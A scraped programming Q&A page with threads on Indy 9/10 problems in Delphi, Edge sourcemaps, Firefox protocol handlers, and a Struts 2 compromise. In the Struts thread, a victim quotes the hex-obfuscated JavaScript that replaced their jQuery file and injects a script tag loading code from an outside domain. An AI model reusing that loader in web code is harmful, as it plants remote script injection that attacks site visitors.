How to use component from the old indy9 package - delphi

I have upgraded Indy9 to Indy10 in Delphi7. Took some time for me to change all the parts with TCP servers and clients but seems like it works nice now.
Now, i noticed one part is still not working, and thats idHTTPserver component.
Our applications web page is using a mootools library. With Indy9 idHTTPserver it works perfectly, however Indy10 does something, which makes browsers fail to display the page.
Besides some other errors, there is this nonsense error like (Firefox Error console output):
Timestamp: 2013.08.07 13:13:56
Error: SyntaxError: missing ] after element list
Source File: http://192.168.100.2:8780/lib/ui/core/mootools-1.2.4-more-yc.js
Line: 103, Column: 60
Source Code:
unction(){var b=["C?","C ","C","C?","C,","C¢","Cƒ","C£","C"","C¤","C.","C?","Ä,","ă","Ä"","Ä.","Ä?","Ä?","ÄŒ","Ĩ","C?
-------------------------------------------------------------^
The actual source code inside this .js is:
long long text ....... function(){var b=["C?","C ","C","C?","C,","C¢","Cƒ","C£","C"","C¤","C.","C?","Ä,","ă","Ä"","Ä.","Ä?","Ä?","ÄŒ","Ĩ","C?","C§","Ä?","ĸ","Ä","Ä'","Cˆ","CØ","C?","C©","CŠ","CR","C<","C«","Äš","Ä>","Ę","ÄT","Ä?","ÄŸ","CŒ","C¬","C¨","C­","C?","C®","C¸","CÆ","Ĺ","Är","Ľ","ľ","Å","Å,","C'","C±","Å?","ň","Ń","Å"","C'","C²","C"","C³","C"","C´","C.","Cµ","C-","C¶","C˜","Cø","Å'","Ř","ÅT","Å"","Å.","Å ","Å?","Å?","ÅŸ","Åš","Å>","Ť","Å?","Ť","Å?","Å¢","Å£","CT","C¹","Cš","Cr","C>","C»","Cœ","C¼","Å®","ÅÆ","Åø","Cæ","C½","C¯","Ž","ž","Ź","År","Å»","ż","C?","C¾","C","C°","CŸ","Å'","Å"","C?","C¦","Aµ"]; ................ long long text
What is happening here?
I took a deep breathe and thought, hey i could just use the old version of idHTTPserver as i still have the source files of Indy9 in the other folder.
If nobody knows how to fix the indy10 HTTPserver, could somebody please tell me how do i use the old version? Just the HTTPserver component (which surely links with 10s of other old indy files).
I tried to include the old sources, but it was becoming a mess, because it would use the idHTTPserver.pas from old version, yet idCustomHTTPserver.pas (this is what happens after i follow the uses of idHTTPserver.pas file) from new version...

To use a different Indy version in one project, set the project search path to Indy\Lib\Core, \Protocols and \System, and instantiate all components in code.
This also has the advantage that you can avoid the uninstall / install steps to switch between different Indy 10 versions.

While this is not the direct answer to my own question in title, this did solve my problem.
I followed the function HTTPserver.WriteContent which led into idHTTPServer.pas, then compared idHTTPServer.pas files of Indy9 and Indy10, the parts about encoding in Indy10 caught my attention.
At line 2039 i have removed the second argument of the write function
FConnection.IOHandler.Write(ContentText, CharsetToEncoding(CharSet));
replaced with
FConnection.IOHandler.Write(ContentText);
This solved my problem. Everything works fine now.
The main problem here was, as commenters have noticed, the extra " symbols.
I was quite stupid because i clicked the link in the firefox console and it opened the javascript file which was of wrong version and for some reason i thought this was what it was supposed to be. Only a bit later i decided to check the actual file on my PC and it turned out that "C"" was not even C, the actual text is this
var b=["À","à","Á","á","Â","â","Ã","ã","Ä","ä","Å","å","Ă","ă","Ą","ą","Ć","ć","Č","č","Ç","ç","Ď","ď","Đ","đ","È","è","É","é","Ê","ê","Ë","ë","Ě","ě","Ę","ę","Ğ","ğ","Ì","ì","Í","í","Î","î","Ï","ï","Ĺ","ĺ","Ľ","ľ","Ł","ł","Ñ","ñ","Ň","ň","Ń","ń","Ò","ò","Ó","ó","Ô","ô","Õ","õ","Ö","ö","Ø","ø","ő","Ř","ř","Ŕ","ŕ","Š","š","Ş","ş","Ś","ś","Ť","ť","Ť","ť","Ţ","ţ","Ù","ù","Ú","ú","Û","û","Ü","ü","Ů","ů","Ÿ","ÿ","ý","Ý","Ž","ž","Ź","ź","Ż","ż","Þ","þ","Ð","ð","ß","Œ","œ","Æ","æ","µ"];
So, i was right. When the whole text goes through CharsetToEncoding, it translates all these single symbol characters into 2 symbols.
I will not accept my own answer as it doesnt really answer the title question and i would love to know if its possible to use a single component of older version while the rest are newer.

Related

How to debug why MS Edge/IE11 does not load sourcemap

I made some source+map concatenation and result works in Firefox and Chrome, but does not even request bundle.js.map from webserver in MS Edge and IE11.
Actual JS file is served from http://localhost:8080/bundle.js
bundle.js ends with line:
//# sourceMappingURL=bundle.js.map
Tried both end it with new line and without, does not work in both cases. Is there some checklist to look at or even some "validator"?
Microsoft Edge expects a single sourcemap comment, located at the end of the file. Your file contains two comments, which appears to cause the issue. Remove all but the final comment, and this should resolve the issue for you.
I will file a ticket to track this issue, but it's unlikely we will modify our implementation to accommodate a non-standard use of sourcemap comments. Thank you for bringing this to our attention though. We'll keep watch to see if this affects other users.

struts 2 bug gaining root access to server

been researching for quite sometime now (research not limited to this site only) but I have not seen any discussion on this "alleged" issue.
My friend told me that they found a critical issue in using struts 2 (2.2.1.1). Told me that a hacker can gain root access to your project's directory. hence he can modify the files in the projects.
I took less notice of it before. But just now, I experienced the same issue.
[Alleged Bug]: Been wondering why, after I deployed my project, all DOM elements whose events are triggered using javascript dont work after sometime. Further investigation, I found out that the jquery lib I uploaded to the server (used jquery-1.3.2.min.js) had been replaced (its content). The filename is the same but the content is something unrecognizable (at least to me), see below:
var _0xfcda=["\x3C\x53\x43\x52\x49\x50\x54\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x61\x64\x73\x6C\x2E\x63\x6F\x6D\x2F\x73\x70\x63\x6F\x64\x65\x2F\x63\x70\x2E\x6A\x73\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xfcda[1]](_0xfcda[0]);
That's when I remembered what my friend told me. Can somebody confirm if the said bug/issue is legit and explain here what it is all about and how it can be fixed. I think this is a pretty huge glitch.
NOTE: I am pretty sure that the code above is not ours. I checked my local copy, and the code is different and everything is okay in my local. Pretty sure as well that nobody else aside from me, knows the root password of the server.
NOTE: I will use the latest struts 2 release, but I think this issue, if legits, need to be discussed thoroughly as a headsup/reference to the community.
My friend told me that they found a critical issue in using struts 2
(2.2.1.1). Told me that a hacker can gain root access to your
project's directory. hence he can modify the files in the projects.
I think he was referring to one of the vulnerabilities discovered and announced on December 2011.
You can read the details in Security Bulletin S2-008.
Arbitrary File Overwrite in Struts <= 2.3.1 (ParameterInterceptor)
While accessing the flag allowStaticMethodAccess within parameters is
prohibited since Struts 2.2.3.1 an attacker can still access public
constructors with only one parameter of type String to create new Java
objects and access their setters with only one parameter of type
String. This can be abused in example to create and overwrite
arbitrary files. To inject forbidden characters into a filename an
uninitialized string property can be used.
I can't know if this is what happened to you, but it's probably what your friend was talking about.
I will use the latest struts 2 release
Then you have (almost) nothing to worry about... until the next vulnerability get discovered and disclosed, then you will need to upgrade again.
As for every software out there, always use the latest (stable) version.

cookies using Delphi 2010 and Indy

I'm new to dealing with cookies and not sure if my code or maybe Indy version is the problem based on researching other posts.
Using Delphi 2010 and Indy 10.5.5.
Have set up a cookiemanager at design time. I can send an initial login request (using the POST method) to the server that is successful (get a "success" code back from the server app) and the cookie manager shows that it has accepted a cookie from the server.
When I try to reply to the server (again using POST) to get the next set of information, I get an error code back from the server app which indicates an authorization failure and I'm being told by the server tech support people to check the cookie being sent with the reply.
How can I check the contents of the cookie header that is being sent back to the server?
Also, in another post I saw that Indy 10 IdCookieManager.pas and IdCookie.pas have been updated in 2011. Should I update my Indy to the latest version as this might be my problem?
Thanks in advance.
Here is some more info:
Thank you for your previous assistance; I appear to be getting closer to reinstalling Indy10.
I purged my system of all Indy stuff except the most recent version (10.5.8) which I downloaded yesterday. [Actually I just moved the old stuff into a directory with an unusual name.]
Now I get a clean compile on all 5 packages.
I was able to add the two main packages (the ones starting with dcl) to my program's project list.
But I get "[DCC Fatal Error] E2202 Required Package IndyCore not found." when I try to compile my main program.
I tried removing and reinstalling the dcl packages to my project. When I removed them, I got the message that IndyCore and 3 other packages would also be removed - so it seems to know that dclIndyCode140 uses IndyCore140.
I've added some directories to my search path and tried placing the 5 bpl's in different directories. None of that had any effect and at this point I am stumped.
Ideas? Suggestions?
Steve
Upgrading to the latest release is definate recommended. Links are on Indy`s website. Yes, cookie support was broken in earlier Indy 10 releases but it working again now.
As for your other question, to see what TIdHTTP is sending, you have a few choices:
Look at the TIdHTTP.Request.RawHeaders property after sending a request.
Attach one of Indy's TIdLog... components to TIdHTTP, such as TIdLogFile, and look at the output.
Use an external packet sniffer, such as Wireshark.

FireFox 6: implementing nsIProtocolHandler

Has something changed in Firefox 6 so I can no longer add my nsIProtocolHandler (and nsIChannel) implementation from an add-on just by registering it under a contract like #mozilla.org/network/protocol;1?name=myscheme?
I've checked all the interfaces I use if any changed (judging by a new
UUID), but I don't get a call to my getFactoryProc I list in NSModule,
like I did before.
Do I need to add a category (like http-startup or something?) or is
something else wrong?
(the code that worked in firefox 3.6 is still here I haven't committed
the new code yet...)
Update: I've logged this as a bug.
Update: Okay, I figured this out. See https://bugzilla.mozilla.org/show_bug.cgi?id=656331. Basically you need to export the right kVersion value in your module or the library will be unloaded immediately after it is loaded (i.e. the behavior you are observing). This behavior is new as of Firefox 5.
If you haven't updated to Firefox 4 yet then you need to change the way that you register your XPCOM component. See https://developer.mozilla.org/en/XPCOM/XPCOM_changes_in_Gecko_2.0. The sections on JS components or binary components are relevant depending on whether your component is implemented in JS or C++.

Delphi Indy: cannot load SSL libraries first time. A retry works

I'm using the latest indy snapshot (installed yesterday) and newest SSL libraries.
When trying to send a mail using idSMTP, the first time the component connects, I get an exception:
Could't load the SSL libraries
. Funny thing is, a retry works always. Debugging I found that the problem is in IsSSLOpenSSLHeader, function Loaad: boolean, line
#OpenSSL_add_all_algorithms := LoadFunctionCLib('OpenSSL_add_all_algorithms');
Why does it fail the first time and not the second is still a mystery to me, but before I go on investigating I would like to as if anybody knows the solution to this problem.
The code you are using is NOT the latest snapshot. That bug was fixed a couple of weeks ago. The line you quote is NOT in the latest code, it has been replaced with the following:
fn_OPENSSL_add_all_algorithms_noconf = 'OPENSSL_add_all_algorithms_noconf';
fn_OpenSSL_add_all_algorithms = 'OpenSSL_add_all_algorithms';
#OpenSSL_add_all_algorithms := LoadOldCLib(fn_OpenSSL_add_all_algorithms, fn_OPENSSL_add_all_algorithms_noconf);
I'm using Delphi XE-1 on Win 7/64, with the SSL and Indy that are installed by default. This week I had to do some work with SMTP and SSL, and I ran into the same problem you reported. Our application is somewhat complex and is already live and deployed in several locations and it uses Indy at several points in the code, so installing a newer version of Indy and rebuilding etc, was not very palatable.
Since the problem only arises on the first pass, I traced through some of the code and came up with this simple, painless workaround:
smtpClient.connect;
smtpClient.disconnect;
smtpClient.connect;
if not smtpClient.Authenticate then
raise ...
smtpClient.Send(msg);
Once you call connnect and then disconnect, the SSL libraries are loaded, so on your second call to connect you're good to go.
Works fine.

Resources